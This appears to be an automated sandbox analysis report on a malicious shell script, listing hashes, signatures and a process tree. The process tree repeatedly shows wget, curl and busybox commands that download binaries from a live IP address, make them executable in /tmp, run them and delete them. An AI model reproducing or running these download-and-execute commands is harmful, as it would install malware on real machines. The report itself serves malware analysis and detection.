Analysis
-
max time kernel
71s -
max time network
73s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
24/11/2024, 02:02
Static task
static1
Behavioral task
behavioral1
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
-
Size
10KB
-
MD5
90e40b4503b0424a058f69437e1026ff
-
SHA1
035df066045d7bc2ab807fc923f25cf1a0f3e70e
-
SHA256
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474
-
SHA512
adfa914962ae7273bfd9238ce16c5b177765452a64ba873335cc42fdab6cf5cf072fb12803403aa10b44c957efbc5e2a76de724c912bde8c573afee70a1a1795
-
SSDEEP
192:8zddR70qV5mSi1dGxvSgM3omSi1de72gdR70qVa:8zddR70kHxvSgM3S72gdR70ka
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh1⤵PID:729
-
/bin/rm/bin/rm bins.sh2⤵PID:732
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:735
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:759
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:762
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:763
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:765
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:768
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:769
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:783
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:794
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:795
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:818
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:825
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:826
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:828
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:831
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:832
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:850
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:861
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:862
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:870
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:873
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:874
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:876
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:879
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:880
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:882
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:885
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:886
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:891
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:894
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:895
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:897
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:900
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:901
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:903
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:906
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:907
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:909
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:912
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:913
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:915
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:918
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:919
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:921
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:924
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:925
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:927
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:930
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:931
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:933
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:936
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:937
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:939
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:942
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:943
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:945
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:948
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:949
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:951
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:954
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:955
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:957
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:960
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:961
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:963
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:966
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:967
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:969
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:972
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:973
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:975
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:978
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:979
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:981
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:984
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:985
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:987
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:990
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:991
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:993
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:996
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:997
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:999
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1002
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97